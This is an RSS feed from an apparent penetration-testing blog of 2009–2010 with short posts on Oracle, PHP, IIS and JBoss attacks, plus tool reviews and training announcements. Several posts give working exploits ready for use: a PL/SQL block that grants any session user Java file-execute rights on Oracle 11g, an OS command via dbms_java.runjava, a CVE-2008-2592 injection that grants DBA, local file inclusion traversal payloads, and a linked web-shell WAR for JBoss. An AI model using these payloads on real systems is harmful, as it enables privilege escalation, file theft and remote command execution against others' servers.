<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>www.notsosecure.com</title>
	<atom:link href="http://www.notsosecure.com/folder2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2</link>
	<description>From Pentesters To Pentesters</description>
	<lastBuildDate>Thu, 04 Feb 2010 20:47:32 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Hacking Oracle 11g</title>
		<link>http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/</link>
		<comments>http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 20:37:40 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=361</guid>
		<description><![CDATA[David Litchfield&#8217;s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:
Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT &#8216;GRANT&#8217;,USER(), &#8216;SYS&#8217;,'java.io.FilePermission&#8217;,&#8217;&#8216;,&#8217;execute&#8217;,'ENABLED&#8217; from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT [...]]]></description>
			<content:encoded><![CDATA[<p>David Litchfield&#8217;s slides from Blackhat DC 2010 are now online. Here is the 0day from his slides, which work even on 11g R2:</p>
<p>Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.</p>
<blockquote><p>DECLARE<br />
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;<br />
CURSOR C1 IS SELECT &#8216;GRANT&#8217;,USER(), &#8216;SYS&#8217;,'java.io.FilePermission&#8217;,&#8217;<&lt;ALL FILES&gt;>&#8216;,&#8217;execute&#8217;,'ENABLED&#8217; from dual;<br />
BEGIN<br />
OPEN C1;<br />
FETCH C1 BULK COLLECT INTO POL;<br />
CLOSE C1;<br />
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);<br />
END;<br />
/</p></blockquote>
<p>Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).</p>
<p>However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:</p>
<blockquote><p>select dbms_java.runjava(&#8217;oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst&#8217;)from dual;</p></blockquote>
<p>Here is the link of the talk video:<br />
<a href="https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov">https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Local File Inclusion with Magic_quotes_gpc enabled</title>
		<link>http://www.notsosecure.com/folder2/2010/02/02/local-file-inclusion-with-magic_quotes_gpc-enabled/</link>
		<comments>http://www.notsosecure.com/folder2/2010/02/02/local-file-inclusion-with-magic_quotes_gpc-enabled/#comments</comments>
		<pubDate>Tue, 02 Feb 2010 09:29:29 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=347</guid>
		<description><![CDATA[So, lets look at a piece of code:
&#60;?php include(&#8217;inc/&#8217;.$_GET['page'].&#8217;php&#8217;); ?&#62;

Normally, you would use the null byte (%00) to exploit it:
vuln.php?page=../../../../../etc/passwd%00
but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.
How to bypass this: it you add a large number of dots (&#8230;..) than the null byte [...]]]></description>
			<content:encoded><![CDATA[<p>So, lets look at a piece of code:</p>
<blockquote><p>&lt;?php include(&#8217;inc/&#8217;.$_GET['page'].&#8217;php&#8217;); ?&gt;
</p></blockquote>
<p>Normally, you would use the null byte (%00) to exploit it:</p>
<blockquote><p>vuln.php?page=../../../../../etc/passwd%00</p></blockquote>
<p>but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.</p>
<p><strong>How to bypass this</strong>: it you add a large number of dots (&#8230;..) than the <del datetime="2010-02-02T12:33:52+00:00">null byte will not get escaped</del> null byte is not required. e.g.</p>
<blockquote><p>vuln.php?<del datetime="2010-02-02T12:33:52+00:00">page=../../../../../etc/passwd%00&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..(200 dots in this case)</del></p></blockquote>
<blockquote><p>vuln.php?page=../../../../../etc/passwd&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..(200 dots in this case)</p></blockquote>
<p><strong>Correction:</strong> You don&#8217;t need null byte here.</p>
<p><strong>Update:</strong> As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link</p>
<p>tested on php version: 5.2.12 (wamp environment)</p>
<p>References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/02/02/local-file-inclusion-with-magic_quotes_gpc-enabled/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Open Redirection</title>
		<link>http://www.notsosecure.com/folder2/2010/01/22/open-redirection/</link>
		<comments>http://www.notsosecure.com/folder2/2010/01/22/open-redirection/#comments</comments>
		<pubDate>Fri, 22 Jan 2010 15:13:07 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=329</guid>
		<description><![CDATA[So, recently i encountered an application which was really secure against XSS.

image link
How many issues can one parameter suffer from:
1. Open redirection
2. Session ID in the URL
3. Session Hijacking by combining 1 and 2
Oh but, really safe against XSS!  
]]></description>
			<content:encoded><![CDATA[<p>So, recently i encountered an application which was really secure against XSS.</p>
<p><img src="http://www.notsosecure.com/folder2/wp-content/uploads/2010/01/who_needs_xss1.PNG" alt="who_needs_xss" title="who_needs_xss" width="600" height="500" class="alignleft size-full wp-image-335" /></p>
<p>image <a href="http://www.notsosecure.com/folder2/wp-content/uploads/2010/01/who_needs_xss1.PNG">link</a><br />
How many issues can one parameter suffer from:</p>
<p>1. Open redirection<br />
2. Session ID in the URL<br />
3. Session Hijacking by combining 1 and 2</p>
<p>Oh but, really safe against XSS! <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2010/01/22/open-redirection/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Twitter</title>
		<link>http://www.notsosecure.com/folder2/2009/12/30/twitter/</link>
		<comments>http://www.notsosecure.com/folder2/2009/12/30/twitter/#comments</comments>
		<pubDate>Wed, 30 Dec 2009 11:46:36 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/2009/12/30/twitter/</guid>
		<description><![CDATA[I have finally decided to give twitter a go. 
Follow me at:
https://twitter.com/notsosecure
]]></description>
			<content:encoded><![CDATA[<p>I have finally decided to give twitter a go. <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
Follow me at:<br />
<a href="https://twitter.com/notsosecure">https://twitter.com/notsosecure</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/12/30/twitter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IIS 0 day vulnerability in parsing files</title>
		<link>http://www.notsosecure.com/folder2/2009/12/24/iis-0-day-vulnerability-in-parsing-files/</link>
		<comments>http://www.notsosecure.com/folder2/2009/12/24/iis-0-day-vulnerability-in-parsing-files/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 21:04:10 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=319</guid>
		<description><![CDATA[Ferruh passed this onto me and this looks like a really interesting vulnerability. Essentially if you can upload a file with semicolon(;) in it, you may be able to upload and execute asp code.
IIS can execute any extension as an Active Server Page or any other executable extension. For instance “malicious.asp;.jpg” is executed as an [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://ferruh.mavituna.com">Ferruh</a> passed this onto me and this looks like a really interesting vulnerability. Essentially if you can upload a file with semicolon(;) in it, you may be able to upload and execute asp code.</p>
<blockquote><p>IIS can execute any extension as an Active Server Page or any other executable extension. For instance “malicious.asp;.jpg” is executed as an ASP file on the server. Many file uploaders protect the system by checking only the last section of the filename as its extension. And by using this vulnerability, an attacker can bypass this protection and upload a dangerous executable file on the server.  </p></blockquote>
<p>Original Advisory can be found<a href="http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf"> here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/12/24/iis-0-day-vulnerability-in-parsing-files/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Exploiting Web Apps With Commerical Tools</title>
		<link>http://www.notsosecure.com/folder2/2009/12/03/exploiting-web-apps-with-commerical-tools/</link>
		<comments>http://www.notsosecure.com/folder2/2009/12/03/exploiting-web-apps-with-commerical-tools/#comments</comments>
		<pubDate>Thu, 03 Dec 2009 17:31:20 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=294</guid>
		<description><![CDATA[For some reason, i never considered core impact an option for web application assessment. But recently i tested the web application RPT module of core impact and found it quite cool. It successfully exploited the Oracle SQL Injection and returned a SQL shell and much to my surprise a OS command shell.
It did the same [...]]]></description>
			<content:encoded><![CDATA[<p>For some reason, i never considered core impact an option for web application assessment. But recently i tested the web application RPT module of core impact and found it quite cool. It successfully exploited the Oracle SQL Injection and returned a SQL shell and much to my surprise a OS command shell.</p>
<p>It did the same against the MS-SQL apps too. A closer look at oracle sql injection exploit revealed that core uses the same dbms_export_extension exploit which bsqlbf and pangolin uses. To obtain the shell with one click in a gui is always cool, less geeky though <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> .</p>
<p><img src="http://www.notsosecure.com/folder2/wp-content/uploads/2009/12/core-oracle2-300x188.PNG" alt="core-oracle" title="core-oracle" width="500" height="288" class="alignleft size-medium wp-image-312" /><br />
On the note of using commercial tools, another 2 tools which i have found very useful are:<br />
<a href="http://portswigger.net/suite/">Burp suite</a><br />
<a href="http://netsparker.com/">Netsparker</a></p>
<p>While everyone knows about burp suite, its small features such as &#8216;AMF decoding/encoding&#8217;, <a href="http://blog.portswigger.net/2008/11/mobp-invisible-proxying.html">invisible proxy</a>, intruder with regex support, right click-> send to scanner feature etc makes it a perfect tool. The burp scanner&#8217;s xss module is just brilliant.</p>
<p>Netsparker is probably a tool which not too many people have heard of. Its an automated web application Its developed by Ferruh Mavituna, who knows this art very well. The tool has so far, given me minimal false positives and at the same time helped in identifying some complex SQL injections you will ever come across(example deep blind injections involving time delays).</p>
<p>More on commercial tools later..</p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/12/03/exploiting-web-apps-with-commerical-tools/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>PHP exploitation with Stefen Esser</title>
		<link>http://www.notsosecure.com/folder2/2009/11/29/php-exploitation-with-stefen-esser/</link>
		<comments>http://www.notsosecure.com/folder2/2009/11/29/php-exploitation-with-stefen-esser/#comments</comments>
		<pubDate>Sun, 29 Nov 2009 12:59:42 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=287</guid>
		<description><![CDATA[Stefen posted his slides on &#8220;Shocking News in PHP Exploitation&#8221;. Besides talking about PHP vulnerabilities, stefen has discussed some great attack vectors for bypassing Mod-security, php-ids and WAFs.
Here is a good example, from his slides, on how mod-security can be bypassed:
&#8212;&#8211;
Rules apply all transformation functions first
• t:none &#8211; reset
• t:urlDecodeUni &#8211; url decoding with unicode [...]]]></description>
			<content:encoded><![CDATA[<p>Stefen posted his slides on &#8220;Shocking News in PHP Exploitation&#8221;. Besides talking about PHP vulnerabilities, stefen has discussed some great attack vectors for bypassing Mod-security, php-ids and WAFs.</p>
<p>Here is a good example, from his slides, on how mod-security can be bypassed:<br />
&#8212;&#8211;<br />
Rules apply all transformation functions first<br />
• t:none &#8211; reset<br />
• t:urlDecodeUni &#8211; url decoding with unicode support<br />
• t:htmlEntityDecode &#8211; decodes HTML entities<br />
• t:replaceComments &#8211; removes all comments<br />
• t:compressWhitespace &#8211; compresses whitespace<br />
&#8212;-<br />
<img src="http://www.notsosecure.com/folder2/wp-content/uploads/2009/11/Screen-shot-2009-11-29-at-1.01.00-PM1-300x200.png" alt="Screen shot 2009-11-29 at 1.01.00 PM" title="Screen shot 2009-11-29 at 1.01.00 PM" width="400" height="300" class="aligncenter size-medium wp-image-291" /><br />
&#8212;</p>
<p><a href="http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf">Download Slides</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/11/29/php-exploitation-with-stefen-esser/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking JBoss with JMX Console</title>
		<link>http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/</link>
		<comments>http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/#comments</comments>
		<pubDate>Tue, 27 Oct 2009 19:38:43 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=285</guid>
		<description><![CDATA[Often while doing Internal Infrastructure assessments, its common to find unrestricted access to JBOSS JMX console. This web interface allows deployment of arbitrary war files. Here is an excellent article describing the process:
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
Here is a war file, ready to use: cmd.war (zipped)
Once deployed check for this file on the vulnerable jboss: http://victim:8080/cmd/cmd.jsp
Happy Hacking  
]]></description>
			<content:encoded><![CDATA[<p>Often while doing Internal Infrastructure assessments, its common to find unrestricted access to JBOSS JMX console. This web interface allows deployment of arbitrary war files. Here is an excellent article describing the process:<br />
<a href="http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf">http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf</a></p>
<p>Here is a war file, ready to use: <a href="http://www.notsosecure.com/folder2/war.zip">cmd.war</a> (zipped)<br />
Once deployed check for this file on the vulnerable jboss: http://victim:8080/cmd/cmd.jsp</p>
<p>Happy Hacking <img src='http://www.notsosecure.com/folder2/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Oracle Security Training(s)</title>
		<link>http://www.notsosecure.com/folder2/2009/10/13/oracle-security-trainings/</link>
		<comments>http://www.notsosecure.com/folder2/2009/10/13/oracle-security-trainings/#comments</comments>
		<pubDate>Tue, 13 Oct 2009 06:18:01 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=281</guid>
		<description><![CDATA[I will be conducting 2 one day Oracle Security Trainings in november and december.
November 19th 2009:
Venue: New Delhi, India
Course Agenda/Outline: http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html 
At Owasp India, I will also be giving a talk. The talk is titled, &#8216;Hacking Oracle From Web&#8217;. Here I will discuss some advanced techniques for exploiting SQL/PLSQL Injections targeting Oracle back-end along with [...]]]></description>
			<content:encoded><![CDATA[<p>I will be conducting 2 one day Oracle Security Trainings in november and december.</p>
<p>November 19th 2009:<br />
Venue: New Delhi, India<br />
Course Agenda/Outline: <a href="http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html">http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html</a> </p>
<p>At Owasp India, I will also be giving a talk. The talk is titled, &#8216;Hacking Oracle From Web&#8217;. Here I will discuss some advanced techniques for exploiting SQL/PLSQL Injections targeting Oracle back-end along with the security problems with other Oracle components such as Oracle Application Servers, Application Portal, Secure Back-up etc. </p>
<p>December 14th 2009<br />
Venue: 7Safe, Sawston, Cambridge, U.K<br />
Course Agenda/Outline:<br />
<a href="http://7safe.com/oracle_database_security_training_course.htm ">http://7safe.com/oracle_database_security_training_course.htm </a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/10/13/oracle-security-trainings/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DBMS_DEFER_SYS; CVE-2008-2592</title>
		<link>http://www.notsosecure.com/folder2/2009/10/01/dbms_defer_sys-cve-2008-2592/</link>
		<comments>http://www.notsosecure.com/folder2/2009/10/01/dbms_defer_sys-cve-2008-2592/#comments</comments>
		<pubDate>Thu, 01 Oct 2009 21:09:20 +0000</pubDate>
		<dc:creator>sid</dc:creator>
				<category><![CDATA[Research]]></category>

		<guid isPermaLink="false">http://www.notsosecure.com/folder2/?p=278</guid>
		<description><![CDATA[The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008
So, if you need to use it outside metasploit, here it is:
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,&#8217;declare pragma autonomous_transaction; begin execute immediate &#8221;grant dba to scott&#8221;;commit;end;&#8217;,0);
DBMS_DEFER_SYS.DELETE_TRAN(&#8217;aaaaaa&#8217;,'a&#8221; and dbms_sql.execute(&#8217;&#124;&#124;D&#124;&#124;&#8217;)=1&#8211;&#8217;);
end;
text file
]]></description>
			<content:encoded><![CDATA[<p>The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008</p>
<p>So, if you need to use it outside metasploit, here it is:</p>
<blockquote><p>DECLARE<br />
D NUMBER;<br />
BEGIN<br />
D := DBMS_SQL.OPEN_CURSOR;<br />
DBMS_SQL.PARSE(D,&#8217;declare pragma autonomous_transaction; begin execute immediate &#8221;grant dba to scott&#8221;;commit;end;&#8217;,0);<br />
DBMS_DEFER_SYS.DELETE_TRAN(&#8217;aaaaaa&#8217;,'a&#8221; and dbms_sql.execute(&#8217;||D||&#8217;)=1&#8211;&#8217;);<br />
end;</p></blockquote>
<p><a href="http://www.notsosecure.com/folder2/dbms_defer_sys.txt">text file</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.notsosecure.com/folder2/2009/10/01/dbms_defer_sys-cve-2008-2592/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
